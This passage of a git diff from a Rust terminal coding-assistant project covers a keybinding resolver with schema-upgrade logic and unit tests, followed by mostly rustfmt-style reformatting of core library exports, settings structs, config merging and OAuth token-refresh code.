== "ctrl+a" && binding.action.as_deref() == Some("openModelPicker") { + continue; + } + + // Old: tab -> togglePreview in Chat context (changed to indent) + if binding.chord == "tab" + && binding.context.as_deref() == Some("Chat") + && binding.action.as_deref() == Some("togglePreview") + { + continue; + } + + user_customizations.insert(binding.chord.clone(), binding.action.clone()); + } + + // Get current defaults and integrate customizations + let mut merged_bindings = Vec::new(); + for default in default_bindings() { + let chord_str = format_chord_string(&default.chord); + let context_str = format!("{:?}", default.context); + + if let Some(custom_action) = user_customizations.get(&chord_str) { + // User has customized this binding, use their version + merged_bindings.push(UserBinding { + chord: chord_str.clone(), + action: custom_action.clone(), + context: Some(context_str), + }); + user_customizations.remove(&chord_str); + } else { + // Use the default + merged_bindings.push(UserBinding { + chord: chord_str, + action: default.action.clone(), + context: Some(context_str), + }); + } + } + + // Add any remaining user customizations that aren't in current defaults + for (chord, action) in user_customizations { + merged_bindings.push(UserBinding { + chord, + action, + context: None, + }); + } + + self.bindings = merged_bindings; + warn!( + "Keybindings schema upgraded from v{} to v{}. User customizations preserved.", + old_version, KEYBINDINGS_SCHEMA_VERSION + ); + } +} + +/// Resolved keybindings (defaults merged with user overrides) +pub struct KeybindingResolver { + bindings: Vec, + pending_chord: Vec, +} + +impl KeybindingResolver { + pub fn new(user: &UserKeybindings) -> Self { + let mut bindings = default_bindings(); + + // Apply user overrides (user bindings win, last match wins) + for user_binding in &user.bindings { + if let Some(chord) = parse_chord(&user_binding.chord) { + let context = user_binding + .context + .as_deref() + .and_then(|c| serde_json::from_str(&format!("\"{}\"", c)).ok()) + .unwrap_or(KeyContext::Global); + + bindings.push(ParsedBinding { + chord, + action: user_binding.action.clone(), + context, + }); + } + } + + Self { + bindings, + pending_chord: Vec::new(), + } + } + + /// Process a keystroke, returns action if binding matches + pub fn process( + &mut self, + keystroke: ParsedKeystroke, + context: &KeyContext, + ) -> KeybindingResult { + self.pending_chord.push(keystroke); + + // Find matching bindings in current context + Global + let matches: Vec<&ParsedBinding> = self + .bindings + .iter() + .filter(|b| &b.context == context || b.context == KeyContext::Global) + .filter(|b| b.chord.starts_with(self.pending_chord.as_slice())) + .collect(); + + if matches.is_empty() { + self.pending_chord.clear(); + return KeybindingResult::NoMatch; + } + + let exact: Vec<&ParsedBinding> = matches + .iter() + .copied() + .filter(|b| b.chord.len() == self.pending_chord.len()) + .collect(); + + if !exact.is_empty() { + // Last match wins (user overrides) + let binding = exact.last().unwrap(); + self.pending_chord.clear(); + return match &binding.action { + Some(action) => KeybindingResult::Action(action.clone()), + None => KeybindingResult::Unbound, + }; + } + + // Chord in progress + KeybindingResult::Pending + } + + pub fn cancel_chord(&mut self) { + self.pending_chord.clear(); + } + + pub fn has_pending_chord(&self) -> bool { + !self.pending_chord.is_empty() + } +} + +impl PartialEq for ParsedKeystroke { + fn eq(&self, other: &Self) -> bool { + self.key == other.key + && self.ctrl == other.ctrl + && self.alt == other.alt + && self.shift == other.shift + && self.meta == other.meta + } +} + +#[derive(Debug, Clone)] +pub enum KeybindingResult { + Action(String), + Unbound, + Pending, + NoMatch, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_parse_keystroke_simple() { + let ks = parse_keystroke("enter").unwrap(); + assert_eq!(ks.key, "enter"); + assert!(!ks.ctrl); + assert!(!ks.alt); + assert!(!ks.shift); + assert!(!ks.meta); + } + + #[test] + fn test_parse_keystroke_ctrl_c() { + let ks = parse_keystroke("ctrl+c").unwrap(); + assert_eq!(ks.key, "c"); + assert!(ks.ctrl); + assert!(!ks.alt); + } + + #[test] + fn test_parse_keystroke_ctrl_shift_enter() { + let ks = parse_keystroke("ctrl+shift+enter").unwrap(); + assert_eq!(ks.key, "enter"); + assert!(ks.ctrl); + assert!(ks.shift); + assert!(!ks.alt); + } + + #[test] + fn test_parse_keystroke_normalizes_esc() { + let ks = parse_keystroke("esc").unwrap(); + assert_eq!(ks.key, "escape"); + } + + #[test] + fn test_parse_keystroke_normalizes_return() { + let ks = parse_keystroke("return").unwrap(); + assert_eq!(ks.key, "enter"); + } + + #[test] + fn test_parse_keystroke_empty_returns_none() { + assert!(parse_keystroke("ctrl+").is_none()); + assert!(parse_keystroke("").is_none()); + } + + #[test] + fn test_parse_chord_single() { + let chord = parse_chord("ctrl+c").unwrap(); + assert_eq!(chord.len(), 1); + assert_eq!(chord[0].key, "c"); + assert!(chord[0].ctrl); + } + + #[test] + fn test_parse_chord_multi() { + let chord = parse_chord("ctrl+k ctrl+d").unwrap(); + assert_eq!(chord.len(), 2); + assert_eq!(chord[0].key, "k"); + assert_eq!(chord[1].key, "d"); + assert!(chord[0].ctrl); + assert!(chord[1].ctrl); + } + + #[test] + fn test_parse_chord_empty_returns_none() { + assert!(parse_chord("").is_none()); + } + + #[test] + fn test_default_bindings_not_empty() { + let bindings = default_bindings(); + assert!(!bindings.is_empty()); + } + + #[test] + fn test_default_bindings_contains_ctrl_c() { + let bindings = default_bindings(); + let ctrl_c = bindings.iter().find(|b| { + b.chord.len() == 1 + && b.chord[0].ctrl + && b.chord[0].key == "c" + && b.context == KeyContext::Global + }); + assert!(ctrl_c.is_some()); + assert_eq!(ctrl_c.unwrap().action.as_deref(), Some("interrupt")); + } + + #[test] + fn test_default_bindings_map_ctrl_shift_a_and_ctrl_k_to_app_shortcuts() { + let bindings = default_bindings(); + + let ctrl_shift_a = bindings.iter().find(|b| { + b.chord.len() == 1 + && b.chord[0].ctrl + && b.chord[0].shift + && b.chord[0].key == "a" + && b.context == KeyContext::Chat + }); + let ctrl_k = bindings.iter().find(|b| { + b.chord.len() == 1 + && b.chord[0].ctrl + && b.chord[0].key == "k" + && b.context == KeyContext::Chat + }); + + assert_eq!( + ctrl_shift_a.and_then(|b| b.action.as_deref()), + Some("openModelPicker") + ); + assert_eq!( + ctrl_k.and_then(|b| b.action.as_deref()), + Some("openCommandPalette") + ); + } + + #[test] + fn test_resolver_simple_action() { + let user = UserKeybindings::default(); + let mut resolver = KeybindingResolver::new(&user); + let ks = parse_keystroke("ctrl+c").unwrap(); + let result = resolver.process(ks, &KeyContext::Global); + assert!(matches!(result, KeybindingResult::Action(ref a) if a == "interrupt")); + } + + #[test] + fn test_resolver_no_match() { + let user = UserKeybindings::default(); + let mut resolver = KeybindingResolver::new(&user); + // ctrl+z has no default binding + let ks = parse_keystroke("ctrl+z").unwrap(); + let result = resolver.process(ks, &KeyContext::Chat); + assert!(matches!(result, KeybindingResult::NoMatch)); + } + + #[test] + fn test_resolver_context_match_global_from_chat() { + let user = UserKeybindings::default(); + let mut resolver = KeybindingResolver::new(&user); + // ctrl+l in Chat context maps to "clearLine" (newly added Phase 1 keybinding) + // Global context is checked after context-specific bindings + let ks = parse_keystroke("ctrl+l").unwrap(); + let result = resolver.process(ks, &KeyContext::Chat); + assert!(matches!(result, KeybindingResult::Action(ref a) if a == "clearLine")); + } + + #[test] + fn test_keystroke_equality() { + let ks1 = parse_keystroke("ctrl+enter").unwrap(); + let ks2 = parse_keystroke("ctrl+enter").unwrap(); + let ks3 = parse_keystroke("shift+enter").unwrap(); + assert_eq!(ks1, ks2); + assert_ne!(ks1, ks3); + } + + #[test] + fn test_user_keybindings_default_empty() { + let user = UserKeybindings::default(); + assert!(user.bindings.is_empty()); + } + + #[test] + fn test_user_keybindings_supports_ts_block_format() { + let user = UserKeybindings::from_json_str( + r#"{ + "bindings": [ + { + "context": "Chat", + "bindings": { + "ctrl+g": "chat:externalEditor", + "space": null + } + } + ] +}"#, + ); + + assert_eq!(user.bindings.len(), 2); + assert_eq!(user.bindings[0].context.as_deref(), Some("Chat")); + assert_eq!(user.bindings[0].chord, "ctrl+g"); + assert_eq!( + user.bindings[0].action.as_deref(), + Some("chat:externalEditor") + ); + assert_eq!(user.bindings[1].chord, "space"); + assert_eq!(user.bindings[1].action, None); + } + + #[test] + fn test_ctrl_j_maps_to_newline() { + let bindings = default_bindings(); + let ctrl_j = bindings.iter().find(|b| { + b.chord.len() == 1 + && b.chord[0].ctrl + && b.chord[0].key == "j" + && b.context == KeyContext::Chat + }); + assert!(ctrl_j.is_some(), "ctrl+j binding not found"); + assert_eq!(ctrl_j.unwrap().action.as_deref(), Some("newline")); + } + + #[test] + fn test_new_phase1_keybindings_registered() { + // Verify that all Phase 1 keybindings are registered + let bindings = default_bindings(); + + // Build list of keybinding actions + let actions: Vec = bindings.iter().filter_map(|b| b.action.clone()).collect(); + + // Check Phase 1 keybinding actions exist + assert!( + actions.contains(&"clearLine".to_string()), + "clearLine action not found" + ); + assert!( + actions.contains(&"submit".to_string()), + "submit action not found" + ); + assert!( + actions.contains(&"jumpToNextError".to_string()), + "jumpToNextError action not found" + ); + assert!( + actions.contains(&"jumpToPreviousError".to_string()), + "jumpToPreviousError action not found" + ); + assert!( + actions.contains(&"previousMessage".to_string()), + "previousMessage action not found" + ); + assert!( + actions.contains(&"nextMessage".to_string()), + "nextMessage action not found" + ); + assert!( + actions.contains(&"openHelp".to_string()), + "openHelp action not found" + ); + assert!( + actions.contains(&"deleteCharBefore".to_string()), + "deleteCharBefore action not found" + ); + assert!( + actions.contains(&"reverseIndent".to_string()), + "reverseIndent action not found" + ); + + // Verify we have at least 10 new keybindings (Phase 1 requirement) + assert!( + actions.len() >= 40, + "Expected at least 40 keybindings, found {}", + actions.len() + ); + } + + #[test] + fn test_old_format_keybindings_get_upgraded() { + let old_format_json = r#"{ + "bindings": [ + { + "context": "Chat", + "bindings": { + "ctrl+shift+a": "openModelPicker", + "ctrl+e": "goLineEnd" + } + } + ] + }"#; + + let mut kb = UserKeybindings::from_json_str(old_format_json); + assert_eq!(kb.schema_version, 0, "Old format should start at version 0"); + + kb.smart_merge_with_defaults(); + + assert_eq!(kb.schema_version, 1, "Should be upgraded to version 1"); + assert!( + kb.bindings.iter().any(|b| b.chord == "meta+left"), + "meta+left (cmd+left) should be added from defaults after merge" + ); + assert!( + kb.bindings.iter().any( + |b| b.chord == "ctrl+shift+a" && b.action.as_deref() == Some("openModelPicker") + ), + "User customization (ctrl+shift+a -> openModelPicker) should be preserved" + ); + } + + #[test] + fn test_cmd_left_resolves_to_go_line_start() { + let user = UserKeybindings::default(); + let mut resolver = KeybindingResolver::new(&user); + + // Create a keystroke for CMD+Left (SUPER modifier + left arrow) + let keystroke = ParsedKeystroke { + key: "left".to_string(), + ctrl: false, + alt: false, + shift: false, + meta: true, + }; + + let result = resolver.process(keystroke, &KeyContext::Chat); + match result { + KeybindingResult::Action(action) => { + assert_eq!(action, "goLineStart", "CMD+Left should map to goLineStart"); + } + other => panic!("Expected Action(\"goLineStart\"), got {:?}", other), + } + } +} diff --git a/src-rust/crates/core/src/lib.rs b/src-rust/crates/core/src/lib.rs index cd7acb1..d3f3807 100644 --- a/src-rust/crates/core/src/lib.rs +++ b/src-rust/crates/core/src/lib.rs @@ -5,14 +5,14 @@ // Branded provider / model identifier newtypes. pub mod provider_id; -pub use provider_id::{ProviderId, ModelId}; +pub use provider_id::{ModelId, ProviderId}; // Session transcript persistence (JSONL, matches TS sessionStorage.ts schema). pub mod session_storage; // SQLite-backed session storage (faster alternative to JSONL). pub mod sqlite_storage; -pub use sqlite_storage::{SqliteSessionStore, SessionSummary}; +pub use sqlite_storage::{SessionSummary, SqliteSessionStore}; // Attachment pipeline — assembles per-turn context attachments (T1-6). pub mod attachments; @@ -28,18 +28,20 @@ pub use auth_store::{AuthStore, StoredCredential}; pub mod device_code; // Utility modules ported from src/utils/ -pub mod token_budget; -pub mod truncate; -pub mod format_utils; -pub mod crypto_utils; -pub mod status_notices; pub mod auto_mode; +pub mod crypto_utils; +pub mod format_utils; pub mod spinner; -pub use spinner::{SPINNER_VERBS, TURN_COMPLETION_VERBS, sample_spinner_verb, sample_completion_verb}; +pub mod status_notices; +pub mod token_budget; +pub mod truncate; +pub use spinner::{ + sample_completion_verb, sample_spinner_verb, SPINNER_VERBS, TURN_COMPLETION_VERBS, +}; // Remote session sync and cloud session API (T3-1, T3-2). -pub mod remote_session; pub mod cloud_session; +pub mod remote_session; // AGENTS.md hierarchical memory loading (T4-1). pub mod claudemd; @@ -55,8 +57,10 @@ pub mod snapshot; // Per-session durable objectives (/goal feature). pub mod goal; -pub use goal::{Goal, GoalError, GoalStatus, GoalStore, MAX_GOAL_TURNS, MAX_OBJECTIVE_CHARS, - goal_continuation_message, goal_kickoff_message, goal_system_prompt_addendum, goals_enabled}; +pub use goal::{ + goal_continuation_message, goal_kickoff_message, goal_system_prompt_addendum, goals_enabled, + Goal, GoalError, GoalStatus, GoalStore, MAX_GOAL_TURNS, MAX_OBJECTIVE_CHARS, +}; // Feature flag management via GrowthBook. pub mod feature_flags; @@ -66,7 +70,7 @@ pub mod mcp_templates; // IDE environment detection (VS Code, Cursor, JetBrains, …). pub mod ide; -pub use ide::{IdeKind, detect_ide}; +pub use ide::{detect_ide, IdeKind}; // Background update checker — compares running version against GitHub releases. pub mod update_check; @@ -76,32 +80,39 @@ pub use update_check::{check_for_updates, UpdateInfo}; pub mod share_export; // Re-export commonly used types at the crate root +pub use config::{ + builtin_managed_agent_presets, default_agents, strip_jsonc_comments, substitute_env_vars, + AgentDefinition, BudgetSplitPolicy, CommandTemplate, Config, FormatterConfig, + ManagedAgentConfig, ManagedAgentPreset, McpServerConfig, OutputFormat, PermissionMode, + ProviderConfig, Settings, SkillsConfig, Theme, +}; pub use error::{ClaudeError, Result}; +pub use import_config::{ + build_import_preview, execute_import, summarize_import_result, ClaudeMdPreview, + ImportExecutionResult, ImportPaths, ImportPreview, ImportSelection, PreviewAction, + PreviewField, SettingsPreview, +}; pub use types::{ - ContentBlock, ImageSource, DocumentSource, CitationsConfig, Message, MessageContent, + CitationsConfig, ContentBlock, DocumentSource, ImageSource, Message, MessageContent, MessageCost, Role, ToolDefinition, ToolResultContent, UsageInfo, }; -pub use config::{AgentDefinition, BudgetSplitPolicy, Config, CommandTemplate, FormatterConfig, ManagedAgentConfig, ManagedAgentPreset, McpServerConfig, OutputFormat, PermissionMode, ProviderConfig, Settings, SkillsConfig, Theme, builtin_managed_agent_presets, default_agents, strip_jsonc_comments, substitute_env_vars}; -pub use import_config::{ClaudeMdPreview, ImportExecutionResult, ImportPaths, ImportPreview, ImportSelection, PreviewAction, PreviewField, SettingsPreview, build_import_preview, execute_import, summarize_import_result}; // Skill discovery: filesystem and git URL skill loading. pub mod skill_discovery; -pub use skill_discovery::{DiscoveredSkill, discover_skills, parse_skill_file}; +pub use skill_discovery::{discover_skills, parse_skill_file, DiscoveredSkill}; // Coven daemon shared state — read-only bridge to ~/.coven/. pub mod coven_shared; // Tier B IPC — blocking HTTP-over-Unix-socket client for the live daemon. pub mod coven_daemon; pub use cost::CostTracker; -pub use history::ConversationSession; pub use feature_flags::FeatureFlagManager; +pub use history::ConversationSession; pub use permissions::{ - AutoPermissionHandler, InteractivePermissionHandler, - ManagedAutoPermissionHandler, ManagedInteractivePermissionHandler, - PermissionAction, PermissionDecision, PermissionHandler, - PermissionLevel, PermissionManager, PermissionRequest, + format_permission_reason, AutoPermissionHandler, InteractivePermissionHandler, + ManagedAutoPermissionHandler, ManagedInteractivePermissionHandler, PermissionAction, + PermissionDecision, PermissionHandler, PermissionLevel, PermissionManager, PermissionRequest, PermissionRule, PermissionScope, SerializedPermissionRule, - format_permission_reason, }; // --------------------------------------------------------------------------- @@ -463,7 +474,10 @@ pub mod types { } /// Create a user message representing a `!`-prefixed local shell command with output. - pub fn user_local_command_output(command: impl Into, output: impl Into) -> Self { + pub fn user_local_command_output( + command: impl Into, + output: impl Into, + ) -> Self { Self { role: Role::User, content: MessageContent::Blocks(vec![ContentBlock::UserLocalCommandOutput { @@ -653,7 +667,7 @@ pub mod config { } fn default_file_injection_max_size() -> usize { - 100 // 100 KB + 100 // 100 KB } /// Definition of a named agent with per-agent model, permissions, @@ -774,10 +788,11 @@ pub mod config { // ---- ManagedAgentConfig ---------------------------------------------- /// Budget allocation strategy between manager and executor agents. - #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)] + #[derive(Debug, Clone, Default, PartialEq, Serialize, Deserialize)] #[serde(tag = "type", rename_all = "snake_case")] pub enum BudgetSplitPolicy { /// Shared pool — no split (default). + #[default] SharedPool, /// Manager gets manager_pct% of total budget. Percentage { manager_pct: u8 }, @@ -785,10 +800,6 @@ pub mod config { FixedCaps { manager_usd: f64, executor_usd: f64 }, } - impl Default for BudgetSplitPolicy { - fn default() -> Self { BudgetSplitPolicy::SharedPool } - } - /// Configuration for manager-executor agent architecture. #[derive(Debug, Clone, Serialize, Deserialize)] pub struct ManagedAgentConfig { @@ -811,8 +822,12 @@ pub mod config { pub executor_isolation: bool, } - fn default_executor_max_turns() -> u32 { 10 } - fn default_max_concurrent_executors() -> u32 { 4 } + fn default_executor_max_turns() -> u32 { + 10 + } + fn default_max_concurrent_executors() -> u32 { + 4 + } /// A named preset for common manager-executor configurations. pub struct ManagedAgentPreset { @@ -983,13 +998,24 @@ pub mod config { pub managed_agents: Option, /// Shadow-git auto-commit snapshot system. `Some(true)` = enabled. `None` or `Some(false)` = disabled (default). /// Set via `--auto-commits` flag or `"autoCommits": true` in settings.json. - #[serde(default, rename = "autoCommits", skip_serializing_if = "Option::is_none")] + #[serde( + default, + rename = "autoCommits", + skip_serializing_if = "Option::is_none" + )] pub auto_commits: Option, /// Enable cursor blinking in the chat prompt. Defaults to false (disabled). - #[serde(default, rename = "cursorBlinkEnabled", skip_serializing_if = "is_false")] + #[serde( + default, + rename = "cursorBlinkEnabled", + skip_serializing_if = "is_false" + )] pub cursor_blink_enabled: bool, /// Maximum number of file suggestions shown in autocomplete. Defaults to 15. - #[serde(default = "default_file_autocomplete_limit", rename = "fileAutocompleteLimit")] + #[serde( + default = "default_file_autocomplete_limit", + rename = "fileAutocompleteLimit" + )] pub file_autocomplete_limit: usize, /// Whether to show hidden files in file autocomplete. Defaults to false. #[serde(default, rename = "fileAutocompleteShowHiddenFiles")] @@ -1003,7 +1029,10 @@ pub mod config { /// Maximum file size to auto-inject (in KB). Defaults to 100. Set to 0 for no limit. /// When a file exceeds this limit, users get a warning and can choose to override or cancel. /// Note: @include in CLAUDE.md/AGENTS.md always injects regardless of this limit. - #[serde(default = "default_file_injection_max_size", rename = "fileInjectionMaxSize")] + #[serde( + default = "default_file_injection_max_size", + rename = "fileInjectionMaxSize" + )] pub file_injection_max_size: usize, } @@ -1146,7 +1175,10 @@ pub mod config { #[serde(default = "default_true", rename = "autoCompact")] pub auto_compact: bool, /// Maximum number of file suggestions shown in autocomplete. Defaults to 15. - #[serde(default = "default_file_autocomplete_limit", rename = "fileAutocompleteLimit")] + #[serde( + default = "default_file_autocomplete_limit", + rename = "fileAutocompleteLimit" + )] pub file_autocomplete_limit: usize, /// Whether to show hidden files in file autocomplete. Defaults to false. #[serde(default, rename = "fileAutocompleteShowHiddenFiles")] @@ -1160,11 +1192,18 @@ pub mod config { /// Maximum file size to auto-inject (in KB). Defaults to 100. Set to 0 for no limit. /// When a file exceeds this limit, users get a warning and can choose to override or cancel. /// Note: @include in CLAUDE.md/AGENTS.md always injects regardless of this limit. - #[serde(default = "default_file_injection_max_size", rename = "fileInjectionMaxSize")] + #[serde( + default = "default_file_injection_max_size", + rename = "fileInjectionMaxSize" + )] pub file_injection_max_size: usize, /// Show a toast when a background bash task or assistant turn finishes. /// `None` (default) → enabled. `Some(false)` → explicitly disabled. - #[serde(default, rename = "completionToast", skip_serializing_if = "Option::is_none")] + #[serde( + default, + rename = "completionToast", + skip_serializing_if = "Option::is_none" + )] pub completion_toast: Option, /// Ring the terminal bell (\x07) when a background bash task or assistant turn finishes. Defaults to false. #[serde(default, rename = "bellOnComplete")] @@ -1192,7 +1231,7 @@ pub mod config { } /// Configuration for a file formatter tool. - #[derive(Debug, Clone, Serialize, Deserialize)] + #[derive(Debug, Clone, Default, Serialize, Deserialize)] pub struct FormatterConfig { /// Command to run, e.g. `["prettier", "--write"]`. pub command: Vec, @@ -1203,12 +1242,6 @@ pub mod config { pub disabled: bool, } - impl Default for FormatterConfig { - fn default() -> Self { - Self { command: Vec::new(), extensions: Vec::new(), disabled: false } - } - } - #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct ProjectSettings { #[serde(default)] @@ -1289,7 +1322,9 @@ pub mod config { Some("mistral") => "mistral-large-latest", Some("xai") => "grok-2", Some("openrouter") => "anthropic/claude-sonnet-4", - Some("togetherai") | Some("together-ai") => "meta-llama/Llama-3.3-70B-Instruct-Turbo", + Some("togetherai") | Some("together-ai") => { + "meta-llama/Llama-3.3-70B-Instruct-Turbo" + } Some("perplexity") => "sonar-pro", Some("cohere") => "command-r-plus", Some("deepinfra") => "meta-llama/Llama-3.3-70B-Instruct", @@ -1305,7 +1340,6 @@ pub mod config { } } - /// Resolve the effective max-tokens. pub fn effective_max_tokens(&self) -> u32 { self.max_tokens @@ -1325,7 +1359,7 @@ pub mod config { pub fn effective_output_style(&self) -> crate::system_prompt::OutputStyle { self.output_style .as_deref() - .map(crate::system_prompt::OutputStyle::from_str) + .map(crate::system_prompt::OutputStyle::parse) .unwrap_or_default() } @@ -1392,7 +1426,7 @@ pub mod config { /// Returns `(credential, use_bearer_auth)`. /// - For Console OAuth flow: credential is the stored API key, bearer=false. /// - For Claude.ai OAuth flow: credential is the access token, bearer=true. - /// Silently attempts token refresh when the access token is expired. + /// Silently attempts token refresh when the access token is expired. pub async fn resolve_auth_async(&self) -> Option<(String, bool)> { if self.selected_provider_id() != "anthropic" { return self.resolve_api_key().map(|key| (key, false)); @@ -1423,25 +1457,43 @@ pub mod config { let refreshed = 'refresh: { let Ok(client) = reqwest::Client::builder() .timeout(std::time::Duration::from_secs(30)) - .build() else { break 'refresh None; }; + .build() + else { + break 'refresh None; + }; let Ok(resp) = client .post(crate::oauth::TOKEN_URL) .header("content-type", "application/json") .json(&body) .send() - .await else { break 'refresh None; }; - if !resp.status().is_success() { break 'refresh None; } - let Ok(data) = resp.json::().await else { break 'refresh None; }; + .await + else { + break 'refresh None; + }; + if !resp.status().is_success() { + break 'refresh None; + } + let Ok(data) = resp.json::().await else { + break 'refresh None; + }; let new_at = data["access_token"].as_str().unwrap_or("").to_string(); - if new_at.is_empty() { break 'refresh None; } + if new_at.is_empty() { + break 'refresh None; + } let new_rt = data["refresh_token"].as_str().map(String::from); let exp_in = data["expires_in"].as_u64().unwrap_or(3600); let exp_ms = chrono::Utc::now().timestamp_millis() + (exp_in as i64 * 1000); let scopes: Vec = data["scope"] - .as_str().unwrap_or("").split_whitespace().map(String::from).collect(); + .as_str() + .unwrap_or("") + .split_whitespace() + .map(String::from) + .collect(); let mut r = tokens.clone(); r.access_token = new_at; - if let Some(nrt) = new_rt { r.refresh_token = Some(nrt); } + if let Some(nrt) = new_rt { + r.refresh_token = Some(nrt); + } r.expires_at_ms = Some(exp_ms); r.scopes = scopes; let _ = r.save().await; @@ -1455,11 +1507,9 @@ pub mod config { tokens }; - if let Some(cred) = tokens.effective_credential() { - Some((cred.to_string(), tokens.uses_bearer_auth())) - } else { - None - } + tokens + .effective_credential() + .map(|cred| (cred.to_string(), tokens.uses_bearer_auth())) } pub fn resolve_provider_api_base(&self, provider_id: &str) -> Option { @@ -1562,14 +1612,23 @@ pub mod config { } // Merge top-level `providers` map into config.provider_configs. for (id, pc) in &self.providers { - config.provider_configs.entry(id.clone()).or_insert_with(|| pc.clone()); + config + .provider_configs + .entry(id.clone()) + .or_insert_with(|| pc.clone()); } // Copy top-level formatters and commands into config. for (k, v) in &self.formatter { - config.formatter.entry(k.clone()).or_insert_with(|| v.clone()); + config + .formatter + .entry(k.clone()) + .or_insert_with(|| v.clone()); } for (k, v) in &self.commands { - config.commands.entry(k.clone()).or_insert_with(|| v.clone()); + config + .commands + .entry(k.clone()) + .or_insert_with(|| v.clone()); } // Copy top-level agent definitions into config. for (k, v) in &self.agents { @@ -1677,7 +1736,9 @@ pub mod config { mut base: HashMap, over: HashMap, ) -> HashMap { - for (k, v) in over { base.insert(k, v); } + for (k, v) in over { + base.insert(k, v); + } base } fn merge_project_settings( @@ -1689,8 +1750,9 @@ pub mod config { Some(existing) => { existing.allowed_tools.extend(project.allowed_tools); existing.allowed_tools.dedup(); - existing.custom_system_prompt = - project.custom_system_prompt.or(existing.custom_system_prompt.take()); + existing.custom_system_prompt = project + .custom_system_prompt + .or(existing.custom_system_prompt.take()); // Keep trusted global per-project MCP servers. Project settings are // sanitized before this merge, so repo-provided MCP servers are empty // and must not erase trusted global entries. @@ -1718,49 +1780,121 @@ pub mod config { }, verbose: over.config.verbose || base.config.verbose, output_format: over.config.output_format, - mcp_servers: { let mut v = base.config.mcp_servers; v.extend(over.config.mcp_servers); v }, - lsp_servers: { let mut v = base.config.lsp_servers; v.extend(over.config.lsp_servers); v }, - allowed_tools: { let mut v = base.config.allowed_tools; v.extend(over.config.allowed_tools); v.dedup(); v }, - disallowed_tools: { let mut v = base.config.disallowed_tools; v.extend(over.config.disallowed_tools); v.dedup(); v }, + mcp_servers: { + let mut v = base.config.mcp_servers; + v.extend(over.config.mcp_servers); + v + }, + lsp_servers: { + let mut v = base.config.lsp_servers; + v.extend(over.config.lsp_servers); + v + }, + allowed_tools: { + let mut v = base.config.allowed_tools; + v.extend(over.config.allowed_tools); + v.dedup(); + v + }, + disallowed_tools: { + let mut v = base.config.disallowed_tools; + v.extend(over.config.disallowed_tools); + v.dedup(); + v + }, env: merge_map(base.config.env, over.config.env), - enable_all_mcp_servers: over.config.enable_all_mcp_servers || base.config.enable_all_mcp_servers, - custom_system_prompt: over.config.custom_system_prompt.or(base.config.custom_system_prompt), - append_system_prompt: over.config.append_system_prompt.or(base.config.append_system_prompt), - disable_claude_mds: over.config.disable_claude_mds || base.config.disable_claude_mds, + enable_all_mcp_servers: over.config.enable_all_mcp_servers + || base.config.enable_all_mcp_servers, + custom_system_prompt: over + .config + .custom_system_prompt + .or(base.config.custom_system_prompt), + append_system_prompt: over + .config + .append_system_prompt + .or(base.config.append_system_prompt), + disable_claude_mds: over.config.disable_claude_mds + || base.config.disable_claude_mds, project_dir: over.config.project_dir.or(base.config.project_dir), - workspace_paths: { let mut v = base.config.workspace_paths; v.extend(over.config.workspace_paths); v }, - additional_dirs: { let mut v = base.config.additional_dirs; v.extend(over.config.additional_dirs); v }, + workspace_paths: { + let mut v = base.config.workspace_paths; + v.extend(over.config.workspace_paths); + v + }, + additional_dirs: { + let mut v = base.config.additional_dirs; + v.extend(over.config.additional_dirs); + v + }, hooks: merge_map(base.config.hooks, over.config.hooks), provider: over.config.provider.or(base.config.provider), - provider_configs: merge_map(base.config.provider_configs, over.config.provider_configs), + provider_configs: merge_map( + base.config.provider_configs, + over.config.provider_configs, + ), formatter: merge_map(base.config.formatter, over.config.formatter), commands: merge_map(base.config.commands, over.config.commands), agents: merge_map(base.config.agents, over.config.agents), familiar: over.config.familiar.or(base.config.familiar), skills: { let mut paths = base.config.skills.paths; - for p in over.config.skills.paths { if !paths.contains(&p) { paths.push(p); } } + for p in over.config.skills.paths { + if !paths.contains(&p) { + paths.push(p); + } + } let mut urls = base.config.skills.urls; - for u in over.config.skills.urls { if !urls.contains(&u) { urls.push(u); } } + for u in over.config.skills.urls { + if !urls.contains(&u) { + urls.push(u); + } + } SkillsConfig { paths, urls } }, managed_agents: over.config.managed_agents.or(base.config.managed_agents), auto_commits: over.config.auto_commits.or(base.config.auto_commits), - cursor_blink_enabled: over.config.cursor_blink_enabled || base.config.cursor_blink_enabled, - file_autocomplete_limit: if over.config.file_autocomplete_limit != 0 { over.config.file_autocomplete_limit } else { base.config.file_autocomplete_limit }, - file_autocomplete_show_hidden_files: over.config.file_autocomplete_show_hidden_files || base.config.file_autocomplete_show_hidden_files, - file_injection_enabled: over.config.file_injection_enabled || base.config.file_injection_enabled, - file_injection_max_size: if over.config.file_injection_max_size != 0 { over.config.file_injection_max_size } else { base.config.file_injection_max_size }, + cursor_blink_enabled: over.config.cursor_blink_enabled + || base.config.cursor_blink_enabled, + file_autocomplete_limit: if over.config.file_autocomplete_limit != 0 { + over.config.file_autocomplete_limit + } else { + base.config.file_autocomplete_limit + }, + file_autocomplete_show_hidden_files: over + .config + .file_autocomplete_show_hidden_files + || base.config.file_autocomplete_show_hidden_files, + file_injection_enabled: over.config.file_injection_enabled + || base.config.file_injection_enabled, + file_injection_max_size: if over.config.file_injection_max_size != 0 { + over.config.file_injection_max_size + } else { + base.config.file_injection_max_size + }, }; Self { config: merged_config, version: over.version.or(base.version), projects: merge_project_settings(base.projects, over.projects), - remote_control_at_startup: over.remote_control_at_startup || base.remote_control_at_startup, - permission_rules: { let mut v = base.permission_rules; v.extend(over.permission_rules); v }, - enabled_plugins: { let mut s = base.enabled_plugins; s.extend(over.enabled_plugins); s }, - disabled_plugins: { let mut s = base.disabled_plugins; s.extend(over.disabled_plugins); s }, - has_completed_onboarding: over.has_completed_onboarding || base.has_completed_onboarding, + remote_control_at_startup: over.remote_control_at_startup + || base.remote_control_at_startup, + permission_rules: { + let mut v = base.permission_rules; + v.extend(over.permission_rules); + v + }, + enabled_plugins: { + let mut s = base.enabled_plugins; + s.extend(over.enabled_plugins); + s + }, + disabled_plugins: { + let mut s = base.disabled_plugins; + s.extend(over.disabled_plugins); + s + }, + has_completed_onboarding: over.has_completed_onboarding + || base.has_completed_onboarding, last_seen_version: over.last_seen_version.or(base.last_seen_version), provider: over.provider.or(base.provider), providers: merge_map(base.providers, over.providers), @@ -1770,9 +1904,17 @@ pub mod config { familiar: over.familiar.or(base.familiar), skills: { let mut paths = base.skills.paths; - for p in over.skills.paths { if !paths.contains(&p) { paths.push(p); } } + for p in over.skills.paths { + if !paths.contains(&p) { + paths.push(p); + } + } let mut urls = base.skills.urls; - for u in 